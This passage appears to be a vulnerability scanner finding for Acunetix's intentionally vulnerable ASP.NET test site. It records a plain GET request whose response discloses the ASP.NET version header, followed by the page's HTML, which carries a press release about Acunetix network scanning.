1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 22904
Response Body - size: 22,904 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAoC8+YwLqXVDFYA1YYr1Hu6oI9o" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> – <strong>May 2019</strong> – Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p> <p>“No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,” said Nicolas Sciberras, CTO.</p> <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p> <p><strong>More Features in the Latest Build</strong></p> <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p> <p>- Support for IPv6<br /> - Improved usage of machine resources<br /> - Added support for Selenium scripts as import files<br /> - Multiple vulnerability checks for SAP<br /> - Unauthorized access detection for Redis and Memcached<br /> - Source code disclosure for Ruby and Python</p> <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p> <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p> <p><strong>Acunetix, the Company</strong></p> <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a 